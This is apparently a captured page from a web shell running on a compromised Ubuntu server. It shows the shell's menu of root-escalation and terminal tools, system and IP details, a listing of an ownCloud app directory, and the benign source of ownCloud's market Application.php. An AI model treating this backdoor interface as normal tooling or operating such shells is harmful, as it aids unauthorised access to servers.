Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
owncloud-prm /
apps /
market /
lib /
Delete
Unzip
Name
Size
Permission
Date
Action
Command
[ DIR ]
drwxr-xr-x
2018-04-17 12:02
Controller
[ DIR ]
drwxr-xr-x
2018-04-17 12:02
Exception
[ DIR ]
drwxr-xr-x
2018-04-17 12:02
Application.php
2.07
KB
-rw-r--r--
2018-04-17 12:02
CheckUpdateBackgroundJob.php
4.43
KB
-rw-r--r--
2018-04-17 12:02
Listener.php
1.37
KB
-rw-r--r--
2018-04-17 12:02
MarketService.php
16.63
KB
-rw-r--r--
2018-04-17 12:02
Notifier.php
3.44
KB
-rw-r--r--
2018-04-17 12:02
Save
Rename
<?php /** * @author Thomas Müller <thomas.mueller@tmit.eu> * * @copyright Copyright (c) 2016, ownCloud GmbH * @license AGPL-3.0 * * This code is free software: you can redistribute it and/or modify * it under the terms of the GNU Affero General Public License, version 3, * as published by the Free Software Foundation. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU Affero General Public License for more details. * * You should have received a copy of the GNU Affero General Public License, version 3, * along with this program. If not, see <http://www.gnu.org/licenses/> * */ namespace OCA\Market; use OCA\Market\Notifier; use OCP\AppFramework\App; use OCP\Migration\IRepairStep; use Symfony\Component\EventDispatcher\GenericEvent; class Application extends App { /** * @param array $urlParams */ public function __construct(array $urlParams = array()) { parent::__construct('market', $urlParams); // needed for translation // t('Market') $listener = $this->getContainer()->query(Listener::class); $dispatcher = $this->getContainer()->getServer()->getEventDispatcher(); $dispatcher->addListener( IRepairStep::class . '::upgradeAppStoreApp', function ($event) use ($listener) { if ($event instanceof GenericEvent) { $listener->upgradeAppStoreApp($event->getSubject()); } } ); $dispatcher->addListener( IRepairStep::class . '::reinstallAppStoreApp', function ($event) use ($listener) { if ($event instanceof GenericEvent) { $listener->reinstallAppStoreApp($event->getSubject()); } } ); $manager = \OC::$server->getNotificationManager(); $manager->registerNotifier(function() use ($manager) { return new Notifier( $manager, \OC::$server->getAppManager(), \OC::$server->getL10NFactory() ); }, function() { $l = \OC::$server->getL10N('market'); return [ 'id' => 'market', 'name' => $l->t('Market notifications'), ]; }); } }